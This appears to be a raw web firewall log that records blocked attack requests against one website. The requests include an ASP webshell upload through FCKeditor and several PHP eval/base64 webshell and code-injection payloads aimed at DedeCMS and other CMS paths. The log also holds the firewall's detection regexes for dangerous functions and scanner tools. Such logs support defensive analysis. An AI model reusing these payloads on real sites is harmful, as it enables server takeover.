/
home
/
wwwlogs
/
free_waf_log
/
Upload File
HOME
["2021-04-09 06:20:40","125.65.46.137","POST","\/FCKeditor\/editor\/filemanager\/connectors\/asp\/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F","Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)","post","from-data 请求异常,拒绝访问,如有误报请点击误报 return_error28","POST \/FCKeditor\/editor\/filemanager\/connectors\/asp\/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP\/1.1\nconnection:Keep-Alive\ncontent-type:multipart\/form-data; boundary=----7df271da040a\naccept:*\/*\nuser-agent:Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\nhost:chinasigiskin.cn\ncontent-length:300\nreferer:http:\/\/chinasigiskin.cn\/FCKeditor\/editor\/filemanager\/connectors\/asp\/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F\n\n-----------------------------7df271da040a\r\nContent-Disposition: form-data; name=\"NewFile\"; filename=\"igk.asp\u0000\u0000jpg\"\r\nContent-Type: application\/octet-stream\r\n\r\n^_^ GIF8a <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(\"lequ\"))%>\r\n-----------------------------7df271da040a--"] ["2021-04-09 06:20:40","125.65.46.137","POST","\/FCKeditor\/editor\/filemanager\/connectors\/asp\/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F","Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)","post","from-data 请求异常,拒绝访问,如有误报请点击误报 return_error28","POST \/FCKeditor\/editor\/filemanager\/connectors\/asp\/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP\/1.1\nconnection:Keep-Alive\ncontent-type:multipart\/form-data; boundary=----7df271da040a\naccept:*\/*\nuser-agent:Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\nhost:chinasigiskin.cn\ncontent-length:300\nreferer:http:\/\/chinasigiskin.cn\/FCKeditor\/editor\/filemanager\/connectors\/asp\/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F\n\n-----------------------------7df271da040a\r\nContent-Disposition: form-data; name=\"NewFile\"; filename=\"igk.asp\u0000\u0000jpg\"\r\nContent-Type: application\/octet-stream\r\n\r\n^_^ GIF8a <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(\"lequ\"))%>\r\n-----------------------------7df271da040a--"] ["2021-04-09 06:20:41","125.65.46.137","POST","\/plus\/90sec.php","Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)","post","base64_decode\\( >> guige:@session_start();$_SESSION[chr(90)]=$_POST[chr(124)];@eval(base64_decode($_SESSION[chr(90)]));die();","POST \/plus\/90sec.php HTTP\/1.1\nconnection:Keep-Alive\ncontent-type:application\/x-www-form-urlencoded\naccept:*\/*\nuser-agent:Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\nhost:chinasigiskin.cn\ncontent-length:189\nreferer:http:\/\/chinasigiskin.cn\/plus\/90sec.php\n\nguige=@session_start();$_SESSION[chr(90)]=$_POST[chr(124)];@eval(base64_decode($_SESSION[chr(90)]));die();&|=ZWNobyAie3JvYm90fSI7"] ["2021-04-09 06:20:41","125.65.46.137","POST","\/utility\/convert\/data\/config.inc.php","Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)","post","base64_decode\\( >> tom:@session_start();$_SESSION[chr(90)]=$_POST[chr(124)];@eval(base64_decode($_SESSION[chr(90)]));die();","POST \/utility\/convert\/data\/config.inc.php HTTP\/1.1\nconnection:Keep-Alive\ncontent-type:application\/x-www-form-urlencoded\naccept:*\/*\nuser-agent:Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\nhost:chinasigiskin.cn\ncontent-length:187\nreferer:http:\/\/chinasigiskin.cn\/utility\/convert\/data\/config.inc.php\n\n|=ZWNobyAie3JvYm90fSI7&tom=@session_start();$_SESSION[chr(90)]=$_POST[chr(124)];@eval(base64_decode($_SESSION[chr(90)]));die();"] ["2021-04-09 06:20:42","125.65.46.137","GET","\/uploads\/dede\/sys_verifies.php?action=getfiles&refiles%5B0%5D=123&refiles%5B1%5D=%5C%22;eval($_POST%5Bysy%5D);die();\/\/","Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)","args","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|char|chr|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> refiles[1]:\\\";eval($_POST[ysy]);die();\/\/","GET \/uploads\/dede\/sys_verifies.php?action=getfiles&refiles%5B0%5D=123&refiles%5B1%5D=%5C%22;eval($_POST%5Bysy%5D);die();\/\/ HTTP\/1.1\nconnection:Keep-Alive\naccept:*\/*\nuser-agent:Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\nhost:chinasigiskin.cn\nreferer:http:\/\/chinasigiskin.cn\/uploads\/dede\/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\\%22;eval($_POST[ysy]);die();\/\/\n\n"] ["2021-04-09 06:20:42","125.65.46.137","POST","\/uploads\/dede\/sys_verifies.php?action=down","Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)","post","base64_decode\\( >> ysy:@session_start();$_SESSION[chr(90)]=$_POST[chr(124)];@eval(base64_decode($_SESSION[chr(90)]));die();","POST \/uploads\/dede\/sys_verifies.php?action=down HTTP\/1.1\nconnection:Keep-Alive\ncontent-type:application\/x-www-form-urlencoded\naccept:*\/*\nuser-agent:Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\nhost:chinasigiskin.cn\ncontent-length:187\nreferer:http:\/\/chinasigiskin.cn\/uploads\/dede\/sys_verifies.php?action=down\n\n|=ZWNobyAie3JvYm90fSI7&ysy=@session_start();$_SESSION[chr(90)]=$_POST[chr(124)];@eval(base64_decode($_SESSION[chr(90)]));die();"] ["2021-04-09 06:20:42","125.65.46.137","GET","\/web\/new\/fenlei\/search.php?mid=1&action=search&keyword=asd&postdb%5Bcity_id%5D=..\/..\/admin\/hack&hack=jfadmin&action=addjf&Apower%5Bjfadmin_mod%5D=1&fid=1&title=$%7Beval($_POST%5Blequ%5D)%7D","Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)","args","\\$\\{ >> title:${eval($_POST[lequ])}","GET \/web\/new\/fenlei\/search.php?mid=1&action=search&keyword=asd&postdb%5Bcity_id%5D=..\/..\/admin\/hack&hack=jfadmin&action=addjf&Apower%5Bjfadmin_mod%5D=1&fid=1&title=$%7Beval($_POST%5Blequ%5D)%7D HTTP\/1.1\nconnection:Keep-Alive\naccept:*\/*\nuser-agent:Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\nhost:chinasigiskin.cn\nreferer:http:\/\/chinasigiskin.cn\/web\/new\/fenlei\/search.php?mid=1&action=search&keyword=asd&postdb[city_id]=..\/..\/admin\/hack&hack=jfadmin&action=addjf&Apower[jfadmin_mod]=1&fid=1&title=${eval($_POST[lequ])}\n\n"] ["2021-04-09 06:20:42","125.65.46.137","GET","\/web\/new\/fenlei\/search.php?mid=1&action=search&keyword=asd&postdb%5Bcity_id%5D=..\/..\/admin\/hack&hack=jfadmin&action=addjf&Apower%5Bjfadmin_mod%5D=1&fid=1&title=$%7Beval($_POST%5Blequ%5D)%7D","Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)","args","60秒以内累计超过6次以上非法请求,封锁360秒","GET \/web\/new\/fenlei\/search.php?mid=1&action=search&keyword=asd&postdb%5Bcity_id%5D=..\/..\/admin\/hack&hack=jfadmin&action=addjf&Apower%5Bjfadmin_mod%5D=1&fid=1&title=$%7Beval($_POST%5Blequ%5D)%7D HTTP\/1.1\nconnection:Keep-Alive\naccept:*\/*\nuser-agent:Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\nhost:chinasigiskin.cn\nreferer:http:\/\/chinasigiskin.cn\/web\/new\/fenlei\/search.php?mid=1&action=search&keyword=asd&postdb[city_id]=..\/..\/admin\/hack&hack=jfadmin&action=addjf&Apower[jfadmin_mod]=1&fid=1&title=${eval($_POST[lequ])}\n\n"] ["2021-04-09 15:05:15","183.51.116.25","GET","\/comment\/api\/index.php?gid=1&page=2&rlist[]=*hex\/$d=chr(65).chr(83).chr(115).chr(101).chr(114).chr(116);@$d($_POST[_]);?%3E","Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/75.0.3770.142 Safari\/537.36","args","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|char|chr|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> rlist[]:*hex\/$d=chr(65).chr(83).chr(115).chr(101).chr(114).chr(116);@$d($_POST[_]);?>","GET \/comment\/api\/index.php?gid=1&page=2&rlist[]=*hex\/$d=chr(65).chr(83).chr(115).chr(101).chr(114).chr(116);@$d($_POST[_]);?%3E HTTP\/1.1\nconnection:keep-alive\ncache-control:no-cache\naccept-language:zh-CN\nuser-agent:Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/75.0.3770.142 Safari\/537.36\nhost:www.chinasigiskin.cn\naccept:text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\n\n"] ["2021-04-09 21:30:55","59.52.178.164","GET","\/","Apache-HttpClient\/4.5.6 (Java\/1.8.0_112)","user_agent","(HTTrack|Apache-HttpClient|harvest|audit|dirbuster|pangolin|nmap|sqln|hydra|Parser|libwww|BBBike|sqlmap|w3af|owasp|Nikto|fimap|havij|zmeu|BabyKrokodil|netsparker|httperf| SF\/) >> 1:Apache-HttpClient\/4.5.6 (Java\/1.8.0_112)","GET \/ HTTP\/1.1\nhost:211.149.227.250:80\naccept-encoding:gzip,deflate\nuser-agent:Apache-HttpClient\/4.5.6 (Java\/1.8.0_112)\nconnection:Keep-Alive\n\n"]